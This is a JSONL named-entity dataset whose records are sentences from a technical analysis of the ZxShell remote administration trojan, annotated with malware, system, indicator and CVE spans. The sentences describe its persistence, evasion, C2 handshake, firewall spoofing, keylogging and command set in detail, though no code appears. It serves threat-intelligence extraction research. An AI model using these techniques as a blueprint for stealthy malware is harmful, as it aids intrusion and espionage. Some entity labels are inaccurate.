attack vectors are watering-hole , spear phishing , and other web-based attacks .", "spans": {}, "info": {"id": "aptner_train_001529", "source": "aptner_train"}} {"text": "Frequently , a remote administration tool ( RAT ) is used to maintain persistence within a victim ’s organization .", "spans": {"System: remote administration tool": [[15, 41]], "System: RAT": [[44, 47]]}, "info": {"id": "aptner_train_001530", "source": "aptner_train"}} {"text": "These tools are used to further compromise the organization by attacking other hosts inside the targets network .", "spans": {}, "info": {"id": "aptner_train_001531", "source": "aptner_train"}} {"text": "ZxShell ( aka Sensocode ) is a Remote Administration Tool ( RAT ) used by Group 72 to conduct cyber-espionage operations .", "spans": {"Malware: ZxShell": [[0, 7]], "Malware: Sensocode": [[14, 23]], "System: Remote Administration Tool": [[31, 57]], "System: RAT": [[60, 63]], "Organization: Group 72": [[74, 82]]}, "info": {"id": "aptner_train_001532", "source": "aptner_train"}} {"text": "Once the RAT is installed on the host it will be used to administer the client , exfiltrate data , or leverage the client as a pivot to attack an organization ’s internal infrastructure .", "spans": {"System: RAT": [[9, 12]]}, "info": {"id": "aptner_train_001533", "source": "aptner_train"}} {"text": "Here is a short list of the types of tools included with ZxShell :", "spans": {"Malware: ZxShell": [[57, 64]]}, "info": {"id": "aptner_train_001534", "source": "aptner_train"}} {"text": "Keylogger ( used to capture passwords and other interesting data ) .", "spans": {"System: Keylogger": [[0, 9]]}, "info": {"id": "aptner_train_001535", "source": "aptner_train"}} {"text": "Command line shell for remote administration .", "spans": {"System: Command line shell": [[0, 18]]}, "info": {"id": "aptner_train_001536", "source": "aptner_train"}} {"text": "Remote desktop .", "spans": {"System: Remote desktop": [[0, 14]]}, "info": {"id": 
"aptner_train_001537", "source": "aptner_train"}} {"text": "Various network attack tools used to fingerprint and compromise other hosts on the network .", "spans": {"System: Various network attack tools": [[0, 28]]}, "info": {"id": "aptner_train_001538", "source": "aptner_train"}} {"text": "Local user account creation tools .", "spans": {"System: Local user account creation tools": [[0, 33]]}, "info": {"id": "aptner_train_001539", "source": "aptner_train"}} {"text": "For a complete list of tools please see the MainConnectionIo section .", "spans": {}, "info": {"id": "aptner_train_001540", "source": "aptner_train"}} {"text": "The following paper is a technical analysis on the functionality of ZxShell .", "spans": {"Malware: ZxShell": [[68, 75]]}, "info": {"id": "aptner_train_001541", "source": "aptner_train"}} {"text": "The analysts involved were able to identify command and control ( C2 ) servers , dropper and installation methods , means of persistence , and identify the attack tools that are core to the RAT ’s purpose .", "spans": {"System: command and control": [[44, 63]], "System: C2": [[66, 68]], "System: RAT": [[190, 193]]}, "info": {"id": "aptner_train_001542", "source": "aptner_train"}} {"text": "In addition , the researchers used their analysis to provide detection coverage for Snort , Fireamp , and ClamAV .", "spans": {"System: Snort": [[84, 89]], "System: Fireamp": [[92, 99]], "System: ClamAV": [[106, 112]]}, "info": {"id": "aptner_train_001543", "source": "aptner_train"}} {"text": "ZxShell has been around since 2004 .", "spans": {"Malware: ZxShell": [[0, 7]]}, "info": {"id": "aptner_train_001544", "source": "aptner_train"}} {"text": "There are a lot of versions available in the underground market .", "spans": {}, "info": {"id": "aptner_train_001545", "source": "aptner_train"}} {"text": "We have analyzed the most common version of ZxShell , version 3.10 .", "spans": {"Malware: ZxShell": [[44, 51]]}, "info": {"id": "aptner_train_001546", "source": 
"aptner_train"}} {"text": "There are newer versions , up to version 3.39 as of October 2014 .", "spans": {}, "info": {"id": "aptner_train_001547", "source": "aptner_train"}} {"text": "An individual who goes by the name LZX in some online forums is believed to be the original author of ZxShell .", "spans": {"Malware: ZxShell": [[102, 109]]}, "info": {"id": "aptner_train_001548", "source": "aptner_train"}} {"text": "Since ZxShell has been around since at least 2004 , numerous people have purchased or obtained the tools necessary to set up ZxShell command and control servers ( C&C ) and generate the malware that is placed on the victim ’s network .", "spans": {"Malware: ZxShell": [[6, 13], [125, 132]], "System: command and control": [[133, 152]], "System: C&C": [[163, 166]]}, "info": {"id": "aptner_train_001549", "source": "aptner_train"}} {"text": "ZxShell has been observed to be distributed through phishing attacks , dropped by exploits that leverage vulnerabilities such as CVE-2011-2462 , CVE-2013-3163 , and CVE-2014-0322 .", "spans": {"Malware: ZxShell": [[0, 7]], "Vulnerability: CVE-2011-2462": [[129, 142]], "Vulnerability: CVE-2013-3163": [[145, 158]], "Vulnerability: CVE-2014-0322": [[165, 178]]}, "info": {"id": "aptner_train_001550", "source": "aptner_train"}} {"text": "To illustrate the functionality of main ZxShell module , Let ’s take a look at the following sample :", "spans": {"Malware: ZxShell": [[40, 47]]}, "info": {"id": "aptner_train_001551", "source": "aptner_train"}} {"text": "MD5 : e3878d541d17b156b7ca447eeb49d96a .", "spans": {"Indicator: e3878d541d17b156b7ca447eeb49d96a": [[6, 38]]}, "info": {"id": "aptner_train_001552", "source": "aptner_train"}} {"text": "SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c .", "spans": {"Indicator: 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c": [[9, 73]]}, "info": {"id": "aptner_train_001553", "source": "aptner_train"}} {"text": "It exports the following functions , 
which are examined in greater detail below : DllMain Install UnInstall ServiceMain ShellMain ShellMainThread zxFunction001 zxFunction002 .", "spans": {}, "info": {"id": "aptner_train_001554", "source": "aptner_train"}} {"text": "DllMain performs the initialization of ZxShell .", "spans": {"Malware: ZxShell": [[39, 46]]}, "info": {"id": "aptner_train_001555", "source": "aptner_train"}} {"text": "It allocates a buffer of 0x2800 bytes and copies the code for the ZxGetLibAndProcAddr function .", "spans": {}, "info": {"id": "aptner_train_001556", "source": "aptner_train"}} {"text": "To copy memory , the memcpy function is invoked .", "spans": {}, "info": {"id": "aptner_train_001557", "source": "aptner_train"}} {"text": "It is not directly used from msvcrt.dll but is instead copied to another memory chunk before being called .", "spans": {"Indicator: msvcrt.dll": [[29, 39]]}, "info": {"id": "aptner_train_001558", "source": "aptner_train"}} {"text": "Finally , the trojan Import Address Table ( IAT ) is resolved and the file path of the process that hosts the DLL is resolved and saved in a global variable .", "spans": {"Malware: trojan": [[14, 20]], "System: Import Address Table": [[21, 41]], "System: IAT": [[44, 47]], "System: DLL": [[110, 113]]}, "info": {"id": "aptner_train_001559", "source": "aptner_train"}} {"text": "ZxShell.dll is injected in a shared SVCHOST process .", "spans": {"Indicator: ZxShell.dll": [[0, 11]], "System: SVCHOST": [[36, 43]]}, "info": {"id": "aptner_train_001560", "source": "aptner_train"}} {"text": "The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service .", "spans": {"System: Svchost": [[4, 11]], "System: HKLM\\SOFTWARE\\Microsoft\\Windows": [[31, 62]], "System: netsvc": [[107, 113]]}, "info": {"id": "aptner_train_001561", "source": "aptner_train"}} {"text": "Before the malware can be installed a unique name must to be 
generated for the service .", "spans": {}, "info": {"id": "aptner_train_001562", "source": "aptner_train"}} {"text": "The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost .", "spans": {"System: netsvc": [[51, 57]], "System: svchost": [[90, 97]], "System: HKLM\\SOFTWARE\\Microsoft\\Windows": [[126, 157]]}, "info": {"id": "aptner_train_001563", "source": "aptner_train"}} {"text": "At startup , Svchost.exe checks the services part of the registry and constructs a list of services to load .", "spans": {"Indicator: Svchost.exe": [[13, 24]]}, "info": {"id": "aptner_train_001564", "source": "aptner_train"}} {"text": "Each Svchost session can contain multiple shared services that are organized in groups .", "spans": {"System: Svchost": [[5, 12]]}, "info": {"id": "aptner_train_001565", "source": "aptner_train"}} {"text": "Therefore , separate services can run , depending on how and where Svchost.exe is started .", "spans": {"Indicator: Svchost.exe": [[67, 78]]}, "info": {"id": "aptner_train_001566", "source": "aptner_train"}} {"text": "Svchost.exe groups are identified in the above registry key .", "spans": {"Indicator: Svchost.exe": [[0, 11]]}, "info": {"id": "aptner_train_001567", "source": "aptner_train"}} {"text": "Each value under this key represents a separate Svchost group and appears as a separate instance when you are viewing active processes .", "spans": {"System: Svchost": [[48, 55]]}, "info": {"id": "aptner_train_001568", "source": "aptner_train"}} {"text": "Each value is a REG_MULTI_SZ value and contains the services that run under that Svchost group .", "spans": {"System: Svchost": [[81, 88]]}, "info": {"id": "aptner_train_001569", "source": "aptner_train"}} {"text": "Each Svchost group can contain one or more service names that are extracted from the following registry key , whose Parameters key contains a ServiceDLL value : 
HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Service .", "spans": {"System: Svchost": [[5, 12]], "System: ServiceDLL": [[142, 152]]}, "info": {"id": "aptner_train_001570", "source": "aptner_train"}} {"text": "On a Windows machine , the netsvc group contains names of both existing and non-existing services .", "spans": {"System: Windows": [[5, 12]], "System: netsvc": [[27, 33]]}, "info": {"id": "aptner_train_001571", "source": "aptner_train"}} {"text": "ZxShell exploits this fact by cycling between each of the names , verifying the existence of the real service .", "spans": {"Malware: ZxShell": [[0, 7]]}, "info": {"id": "aptner_train_001572", "source": "aptner_train"}} {"text": "The service ’s existence is verified with the ServiceExists function , which attempts to open the relative registry sub-key in HKLM\\SYSTEM\\CurrentControlSet\\Services .", "spans": {}, "info": {"id": "aptner_train_001573", "source": "aptner_train"}} {"text": "The first service name that is not installed on the system becomes the ZxShell service name .", "spans": {"Malware: ZxShell": [[71, 78]]}, "info": {"id": "aptner_train_001574", "source": "aptner_train"}} {"text": "A new service is then created using the service parser function ProcessScCommand .", "spans": {}, "info": {"id": "aptner_train_001575", "source": "aptner_train"}} {"text": "ZxShell implemented its own version of the Windows SC command .", "spans": {"Malware: ZxShell": [[0, 7]], "System: Windows SC command": [[43, 61]]}, "info": {"id": "aptner_train_001576", "source": "aptner_train"}} {"text": "There are minor differences between the ZxShell implementation of this command and the original Windows one .", "spans": {"Malware: ZxShell": [[40, 47]], "System: Windows": [[96, 103]]}, "info": {"id": "aptner_train_001577", "source": "aptner_train"}} {"text": "The installed service registry key is opened and the 2 values under its Parameter subkey are created .", "spans": {}, "info": {"id": "aptner_train_001578", "source": 
"aptner_train"}} {"text": "These 2 values , ServiceDll and ServiceDllUnloadOnStop are needed for services that run in a shared process .", "spans": {"System: ServiceDll": [[17, 27]], "System: ServiceDllUnloadOnStop": [[32, 54]]}, "info": {"id": "aptner_train_001579", "source": "aptner_train"}} {"text": "Before the service is started ChangeServiceConfig is called to modify the service type to shared and interactive .", "spans": {}, "info": {"id": "aptner_train_001580", "source": "aptner_train"}} {"text": "If the service fails to start then a random service name formatted as netsvc_xxxxxxxx , where xxxxxxxx represent an 8-digit random hex value , is added to the netsvc group and the entire function is repeated .", "spans": {"System: netsvc": [[159, 165]]}, "info": {"id": "aptner_train_001581", "source": "aptner_train"}} {"text": "This function is the entry point of the service .", "spans": {}, "info": {"id": "aptner_train_001582", "source": "aptner_train"}} {"text": "It registers the service using the RegisterServiceCtrlHandler Windows API function .", "spans": {"System: Windows": [[62, 69]]}, "info": {"id": "aptner_train_001583", "source": "aptner_train"}} {"text": "The ZxShell service handler routine is only a stub : it responds to each service request code , doing nothing , and finally exits .", "spans": {"Malware: ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001584", "source": "aptner_train"}} {"text": "It sets the service status to RUNNING and finally calls the ShellMain function of ZxShell .", "spans": {"Malware: ZxShell": [[82, 89]]}, "info": {"id": "aptner_train_001585", "source": "aptner_train"}} {"text": "The ShellMain function is a stub that relocates the DLL to another buffer and spawns a thread that starts from ShellMainThreadInt at offset +0xC0CD .", "spans": {"System: DLL": [[52, 55]]}, "info": {"id": "aptner_train_001586", "source": "aptner_train"}} {"text": "The ShellMainThreadInt function gets the HeapDestroy Windows API address and replaces 
the first 3 bytes with the RET 4 opcode .", "spans": {"System: Windows": [[53, 60]]}, "info": {"id": "aptner_train_001587", "source": "aptner_train"}} {"text": "Subsequently , it calls the FreeLibrary function to free its own DLL buffer located at its original address .", "spans": {"System: DLL": [[65, 68]]}, "info": {"id": "aptner_train_001588", "source": "aptner_train"}} {"text": "Because of this , the allocated heaps will not be freed .", "spans": {}, "info": {"id": "aptner_train_001589", "source": "aptner_train"}} {"text": "It re-copies the DLL from the new buffer to the original one using the memcpy function .", "spans": {"System: DLL": [[17, 20]]}, "info": {"id": "aptner_train_001590", "source": "aptner_train"}} {"text": "Finally , it spawns the main thread that starts at the original location of ShellMainThread procedure , and terminates .", "spans": {}, "info": {"id": "aptner_train_001591", "source": "aptner_train"}} {"text": "At this point , the ZxShell library is no longer linked in the module list of the host process .", "spans": {"Malware: ZxShell": [[20, 27]]}, "info": {"id": "aptner_train_001592", "source": "aptner_train"}} {"text": "This is important because if any system tool tries to open the host process it will never display the ZxShell DLL .", "spans": {"Malware: ZxShell": [[102, 109]], "System: DLL": [[110, 113]]}, "info": {"id": "aptner_train_001593", "source": "aptner_train"}} {"text": "This thread implements the main code , responsible for the entire botnet DLL .", "spans": {"Malware: botnet": [[66, 72]], "System: DLL": [[73, 76]]}, "info": {"id": "aptner_train_001594", "source": "aptner_train"}} {"text": "First , it checks if the DLL is executed as a service .", "spans": {"System: DLL": [[25, 28]]}, "info": {"id": "aptner_train_001595", "source": "aptner_train"}} {"text": "If so , it spawns the service watchdog thread .", "spans": {"System: watchdog": [[30, 38]]}, "info": {"id": "aptner_train_001596", "source": "aptner_train"}} {"text": 
"The watchdog thread checks the registry path of the ZxShell service every 2 seconds , to verify that it has n’t been modified .", "spans": {"System: watchdog": [[4, 12]], "Malware: ZxShell": [[52, 59]]}, "info": {"id": "aptner_train_001597", "source": "aptner_train"}} {"text": "If a user or an application modifies the ZxShell service registry key , the code restores the original infected service key and values .", "spans": {"Malware: ZxShell": [[41, 48]]}, "info": {"id": "aptner_train_001598", "source": "aptner_train"}} {"text": "The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function .", "spans": {"Malware: ZxShell": [[26, 33]], "System: Dll": [[34, 37]]}, "info": {"id": "aptner_train_001599", "source": "aptner_train"}} {"text": "A handle to the DLL file is taken in order to make its deletion more difficult .", "spans": {"System: DLL": [[16, 19]]}, "info": {"id": "aptner_train_001600", "source": "aptner_train"}} {"text": "The ZxShell mutex is created named @_ZXSHELL_@ .", "spans": {"System: ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001601", "source": "aptner_train"}} {"text": "ZxShell plugins are parsed and loaded with the AnalyseAndLoadPlugins function .", "spans": {"Malware: ZxShell": [[0, 7]]}, "info": {"id": "aptner_train_001602", "source": "aptner_train"}} {"text": "The plugin registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\zxplug is opened and each value is queried .", "spans": {}, "info": {"id": "aptner_train_001603", "source": "aptner_train"}} {"text": "The registry value contains the plugin file name .", "spans": {}, "info": {"id": "aptner_train_001604", "source": "aptner_train"}} {"text": "The target file is loaded using the LoadLibrary API function , and the address of the exported function zxMain is obtained with GetProcAddress .", "spans": {}, "info": {"id": "aptner_train_001605", "source": "aptner_train"}} {"text": "If the target filename is incorrect or invalid the plugin file is deleted 
and the registry value is erased .", "spans": {}, "info": {"id": "aptner_train_001606", "source": "aptner_train"}} {"text": "That is performed by the function DeleteAndLogPlugin .", "spans": {}, "info": {"id": "aptner_train_001607", "source": "aptner_train"}} {"text": "Otherwise , the plugin is added to an internal list .", "spans": {}, "info": {"id": "aptner_train_001608", "source": "aptner_train"}} {"text": "The thread KeyloggerThread is spawned and is responsible for doing keylogging on the target workstation .", "spans": {"Organization: KeyloggerThread": [[11, 26]]}, "info": {"id": "aptner_train_001609", "source": "aptner_train"}} {"text": "We will take a look at the keylogger later on .", "spans": {"System: keylogger": [[27, 36]]}, "info": {"id": "aptner_train_001610", "source": "aptner_train"}} {"text": "Finally the main network communication function GetIpListAndConnect is called .", "spans": {}, "info": {"id": "aptner_train_001611", "source": "aptner_train"}} {"text": "This function is at the core of the RAT ’s network communication .", "spans": {"System: RAT": [[36, 39]]}, "info": {"id": "aptner_train_001612", "source": "aptner_train"}} {"text": "It starts by initializing a random number generator and reading 100 bytes inside the ZxShell Dll at a hardcoded location .", "spans": {"Malware: ZxShell": [[85, 92]], "System: Dll": [[93, 96]]}, "info": {"id": "aptner_train_001613", "source": "aptner_train"}} {"text": "These bytes are XOR encrypted with the byte-key 0x85 and contains a list of remote hosts where to connect .", "spans": {}, "info": {"id": "aptner_train_001614", "source": "aptner_train"}} {"text": "The data is decrypted , the remote host list is parsed and verified using the BuildTargetIpListStruct function .", "spans": {}, "info": {"id": "aptner_train_001615", "source": "aptner_train"}} {"text": "There are 3 types of lists recognized by ZxShell : plain ip addresses , HTTP and FTP addresses .", "spans": {"Malware: ZxShell": [[41, 48]]}, "info": 
{"id": "aptner_train_001616", "source": "aptner_train"}} {"text": "If the list does not contain any item , or if the verification has failed , the ZxShell sample tries to connect to a hardcoded host", "spans": {"Malware: ZxShell": [[80, 87]]}, "info": {"id": "aptner_train_001617", "source": "aptner_train"}} {"text": "with the goal of retrieving a new updated list .", "spans": {}, "info": {"id": "aptner_train_001618", "source": "aptner_train"}} {"text": "Otherwise , ZxShell tries to connect to the first item of the list .", "spans": {"Malware: ZxShell": [[12, 19]]}, "info": {"id": "aptner_train_001619", "source": "aptner_train"}} {"text": "If ZxShell successfully connects to the remote host , the function DoHandshake is called .", "spans": {"Malware: ZxShell": [[3, 10]]}, "info": {"id": "aptner_train_001620", "source": "aptner_train"}} {"text": "This function implements the initial handshake which consists of exchanging 16 bytes , 0x00001985 and 0x00000425,", "spans": {}, "info": {"id": "aptner_train_001621", "source": "aptner_train"}} {"text": "with the server .", "spans": {}, "info": {"id": "aptner_train_001622", "source": "aptner_train"}} {"text": "The function GetLocalPcDescrStr is used to compose a large string that contains system information of the target workstation .", "spans": {}, "info": {"id": "aptner_train_001623", "source": "aptner_train"}} {"text": "The string is sent to the remote host and the response is checked to see if the first byte of the response is 0xF4, an arbitrary byte .", "spans": {}, "info": {"id": "aptner_train_001624", "source": "aptner_train"}} {"text": "If it is , the botnet connection I/O procedure is called through the MainConnectionIo function .", "spans": {"Malware: botnet": [[15, 21]]}, "info": {"id": "aptner_train_001625", "source": "aptner_train"}} {"text": "Otherwise , the ZxShell code closes the socket used and sleeps for 30 seconds .", "spans": {"Malware: ZxShell": [[16, 23]]}, "info": {"id": "aptner_train_001626", 
"source": "aptner_train"}} {"text": "It will then retry the connection with the next remote host , if there is one .", "spans": {}, "info": {"id": "aptner_train_001627", "source": "aptner_train"}} {"text": "It is noteworthy that this function includes the code to set the ZxShell node as a server : if one of the hardcoded boolean value is set to 1, a listening socket is created .", "spans": {"Malware: ZxShell": [[65, 72]]}, "info": {"id": "aptner_train_001628", "source": "aptner_train"}} {"text": "The code waits for an incoming connection .", "spans": {}, "info": {"id": "aptner_train_001629", "source": "aptner_train"}} {"text": "When the connection is established a new thread is spawned that starts with the MainConnectionIo function .", "spans": {}, "info": {"id": "aptner_train_001630", "source": "aptner_train"}} {"text": "The MainConnectionIo function checks if the Windows Firewall is enabled , sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function .", "spans": {"System: Windows": [[44, 51]], "System: Firewall": [[52, 60]], "System: Tcp Keep Alive": [[83, 97]]}, "info": {"id": "aptner_train_001631", "source": "aptner_train"}} {"text": "Then the connection is retried .", "spans": {}, "info": {"id": "aptner_train_001632", "source": "aptner_train"}} {"text": "The received command is then processed by the ZxShell function with the ProcessCommand function .", "spans": {"Malware: ZxShell": [[46, 53]]}, "info": {"id": "aptner_train_001633", "source": "aptner_train"}} {"text": "The command processing function starts by substituting the main module name and path in the hosting process PEB , with the one of the default internet browser .", "spans": {}, "info": {"id": "aptner_train_001634", "source": "aptner_train"}} {"text": "This trick renders identification by firewall more cumbersome .", "spans": {"System: firewall": [[37, 45]]}, "info": {"id": "aptner_train_001635", "source": 
"aptner_train"}} {"text": "A host firewall", "spans": {}, "info": {"id": "aptner_train_001636", "source": "aptner_train"}} {"text": " recognize the outgoing connection as originated by the browser instead of the ZxShell service host process .", "spans": {"Malware: ZxShell": [[79, 86]]}, "info": {"id": "aptner_train_001637", "source": "aptner_train"}} {"text": "The browser process always performs outgoing connections and the firewall should n’t block them .", "spans": {"System: firewall": [[65, 73]]}, "info": {"id": "aptner_train_001638", "source": "aptner_train"}} {"text": "The command processing is straightforward .", "spans": {}, "info": {"id": "aptner_train_001639", "source": "aptner_train"}} {"text": "Here is the list of common commands :", "spans": {}, "info": {"id": "aptner_train_001640", "source": "aptner_train"}} {"text": "Help / ? Get help .", "spans": {}, "info": {"id": "aptner_train_001641", "source": "aptner_train"}} {"text": "Exit / Quit Exit and shut down the botnet client .", "spans": {}, "info": {"id": "aptner_train_001642", "source": "aptner_train"}} {"text": "SysInfo Get target System information .", "spans": {}, "info": {"id": "aptner_train_001643", "source": "aptner_train"}} {"text": "SYNFlood Perform a SYN attack on a host .", "spans": {}, "info": {"id": "aptner_train_001644", "source": "aptner_train"}} {"text": "Ps Process service Unix command implementation .", "spans": {"System: Unix": [[19, 23]]}, "info": {"id": "aptner_train_001645", "source": "aptner_train"}} {"text": "CleanEvent Clear System Event log .", "spans": {}, "info": {"id": "aptner_train_001646", "source": "aptner_train"}} {"text": "FindPass Find login account password .", "spans": {}, "info": {"id": "aptner_train_001647", "source": "aptner_train"}} {"text": "FileTime Get time information about a file .", "spans": {}, "info": {"id": "aptner_train_001648", "source": "aptner_train"}} {"text": "FindDialPass List all the dial-up accounts and passwords .", "spans": {}, "info": {"id": 
"aptner_train_001649", "source": "aptner_train"}} {"text": "User Account Management System .", "spans": {}, "info": {"id": "aptner_train_001650", "source": "aptner_train"}} {"text": "TransFile Transfer file in or from remote host .", "spans": {}, "info": {"id": "aptner_train_001651", "source": "aptner_train"}} {"text": "Execute Run a program in the remote host .", "spans": {}, "info": {"id": "aptner_train_001652", "source": "aptner_train"}} {"text": "SC Service control command , implemented as the Windows one .", "spans": {"System: Windows": [[48, 55]]}, "info": {"id": "aptner_train_001653", "source": "aptner_train"}} {"text": "CA Clone user account .", "spans": {}, "info": {"id": "aptner_train_001654", "source": "aptner_train"}} {"text": "RunAs Create new process as another User or Process context .", "spans": {}, "info": {"id": "aptner_train_001655", "source": "aptner_train"}} {"text": "TermSvc Terminal service configuration ( working on Win Xp/2003 ) .", "spans": {"System: Win Xp/2003": [[52, 63]]}, "info": {"id": "aptner_train_001656", "source": "aptner_train"}} {"text": "GetCMD Remote Shell .", "spans": {}, "info": {"id": "aptner_train_001657", "source": "aptner_train"}} {"text": "Shutdown Logout , shutdown or restart the target system .", "spans": {}, "info": {"id": "aptner_train_001658", "source": "aptner_train"}} {"text": "ZXARPS Spoofing , redirection , packet capture .", "spans": {}, "info": {"id": "aptner_train_001659", "source": "aptner_train"}} {"text": "ZXNC Run ZXNC v1.1 – a simple telnet client .", "spans": {}, "info": {"id": "aptner_train_001660", "source": "aptner_train"}} {"text": "ZXHttpProxy Run a HTTP proxy server on the workstation .", "spans": {}, "info": {"id": "aptner_train_001661", "source": "aptner_train"}} {"text": "ZXSockProxy Run a Sock 4 & 5 Proxy server .", "spans": {}, "info": {"id": "aptner_train_001662", "source": "aptner_train"}} {"text": "ZXHttpServer Run a custom HTTP server .", "spans": {}, "info": {"id": 
"aptner_train_001663", "source": "aptner_train"}} {"text": "PortScan Run TCP Port MultiScanner v1.0 .", "spans": {}, "info": {"id": "aptner_train_001664", "source": "aptner_train"}} {"text": "KeyLog Capture or record the remote computer ’s keystrokes .", "spans": {}, "info": {"id": "aptner_train_001665", "source": "aptner_train"}} {"text": "The implementation is a userland keylogger that polls the keymap with each keystroke .", "spans": {"System: keylogger": [[33, 42]]}, "info": {"id": "aptner_train_001666", "source": "aptner_train"}} {"text": "LoadDll Load a DLL into the specified process .", "spans": {"System: LoadDll": [[0, 7]], "System: DLL": [[15, 18]]}, "info": {"id": "aptner_train_001667", "source": "aptner_train"}} {"text": "End Terminate ZxShell DLL .", "spans": {"Malware: ZxShell": [[14, 21]], "System: DLL": [[22, 25]]}, "info": {"id": "aptner_train_001668", "source": "aptner_train"}} {"text": "Uninstall Uninstall and terminate ZxShell bot DLL .", "spans": {"Malware: ZxShell": [[34, 41]], "System: DLL": [[46, 49]]}, "info": {"id": "aptner_train_001669", "source": "aptner_train"}} {"text": "ShareShell Share a shell to other .", "spans": {}, "info": {"id": "aptner_train_001670", "source": "aptner_train"}} {"text": "CloseFW Switch off Windows Firewall .", "spans": {"System: Windows": [[19, 26]]}, "info": {"id": "aptner_train_001671", "source": "aptner_train"}} {"text": "FileMG File Manager . winvnc Remote Desktop . rPortMap Port Forwarding . capsrv Video Device Spying . 
zxplug Add and load a ZxShell custom plugin .", "spans": {"Malware: ZxShell": [[124, 131]]}, "info": {"id": "aptner_train_001672", "source": "aptner_train"}} {"text": "This set of functionality allows the operator complete control of a system .", "spans": {}, "info": {"id": "aptner_train_001673", "source": "aptner_train"}} {"text": "Being able to transfer and execute files on the infected system means the attacker can run any code they please .", "spans": {}, "info": {"id": "aptner_train_001674", "source": "aptner_train"}} {"text": "Further , the keylogging and remote desktop functionality allows the operator to spy on the infected machine , observing all keystrokes and viewing all user actions .", "spans": {}, "info": {"id": "aptner_train_001675", "source": "aptner_train"}} {"text": "Unloads ZxShell and deletes all of the active components .", "spans": {"Malware: ZxShell": [[8, 15]]}, "info": {"id": "aptner_train_001676", "source": "aptner_train"}} {"text": "This simply deletes the ZxShell service key from the Windows registry ( using SHDeleteKey Api ) and all of the subkeys .", "spans": {"Malware: ZxShell": [[24, 31]], "System: Windows": [[53, 60]]}, "info": {"id": "aptner_train_001677", "source": "aptner_train"}} {"text": "Finally , it marks ZxShell main Dll for deletion with the MoveFileEx Windows API .", "spans": {"Malware: ZxShell": [[19, 26]], "System: Dll": [[32, 35]], "System: Windows": [[69, 76]]}, "info": {"id": "aptner_train_001678", "source": "aptner_train"}} {"text": "This function is the supporting functionality for WinVNC .", "spans": {"System: WinVNC": [[50, 56]]}, "info": {"id": "aptner_train_001679", "source": "aptner_train"}} {"text": "To allow the VNC session to connect , the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001 . 
zxFunction001 modifies the current process memory , uses data contained in the named pipe to create a socket , and then executes the code that sends the remote desktop session to the server controller .", "spans": {"System: VNC": [[13, 16]], "System: WSAProtcol_Info": [[65, 80]]}, "info": {"id": "aptner_train_001680", "source": "aptner_train"}} {"text": "ZxFunction002 This will either bind the calling process to a port or has the calling process connect to a remote host .", "spans": {}, "info": {"id": "aptner_train_001681", "source": "aptner_train"}} {"text": "The functionality ( connect or bind ) depends on the data contained within the named pipe .", "spans": {}, "info": {"id": "aptner_train_001682", "source": "aptner_train"}} {"text": "Unlike zxFunction001, this is not used by", "spans": {}, "info": {"id": "aptner_train_001683", "source": "aptner_train"}} {"text": "any of the RAT commands in the zxshell.dll .", "spans": {"System: RAT": [[11, 14]], "Indicator: zxshell.dll": [[31, 42]]}, "info": {"id": "aptner_train_001684", "source": "aptner_train"}} {"text": "Apart from user-mode ZxShell droppers mentioned earlier , there is a file ( SHA256 : 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335 ) that installs a kernel device driver called loveusd.sys .", "spans": {"Malware: ZxShell": [[21, 28]], "Indicator: 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335": [[85, 149]], "Indicator: loveusd.sys": [[196, 207]]}, "info": {"id": "aptner_train_001685", "source": "aptner_train"}} {"text": "The architecture of this dropper is different from the others : it starts extracting the main driver from itself .", "spans": {}, "info": {"id": "aptner_train_001686", "source": "aptner_train"}} {"text": "It adds the SeLoadDriver privilege to its access token and proceeds to install the driver as a fake disk filter driver .", "spans": {"System: SeLoadDriver": [[12, 24]]}, "info": {"id": "aptner_train_001687", "source": "aptner_train"}} {"text": "It then 
adds the “ Loveusd.sys ” extracted driver name to the upper filter list .", "spans": {"Indicator: Loveusd.sys": [[19, 30]]}, "info": {"id": "aptner_train_001688", "source": "aptner_train"}} {"text": "In our analysed sample the “ Loveusd.sys ” driver is installed with the name “ USBHPMS ” .", "spans": {"Indicator: Loveusd.sys": [[29, 40]], "Indicator: USBHPMS": [[79, 86]]}, "info": {"id": "aptner_train_001689", "source": "aptner_train"}} {"text": "Finally the driver is started using the ZwLoadDriver native API .", "spans": {}, "info": {"id": "aptner_train_001690", "source": "aptner_train"}} {"text": "The ZxShell driver starts by acquiring some kernel information and then hooking “ ObReferenceObjectByHandle ” API .", "spans": {"Malware: ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001691", "source": "aptner_train"}} {"text": "Finally it spawns 2 system threads .", "spans": {}, "info": {"id": "aptner_train_001692", "source": "aptner_train"}} {"text": "The first thread is the “ communication ” thread .", "spans": {"System: communication": [[26, 39]]}, "info": {"id": "aptner_train_001693", "source": "aptner_train"}} {"text": "ZxShell employs a strange method for communication : it hooks the NtWriteFile API and recognizes 5 different special handle values as commands :", "spans": {"Malware: ZxShell": [[0, 7]]}, "info": {"id": "aptner_train_001694", "source": "aptner_train"}} {"text": "0x111111111 : Hide “ Loveusd ” driver from the system kernel driver list . 0x22222222 : Securely delete an in-use or no-access target file-name . 0x44444444 : Unhook the ZwWriteFile API and hook KiFastCallEntry . 0x55555555 : Remove the ZxShell Image Load Notify routine . 
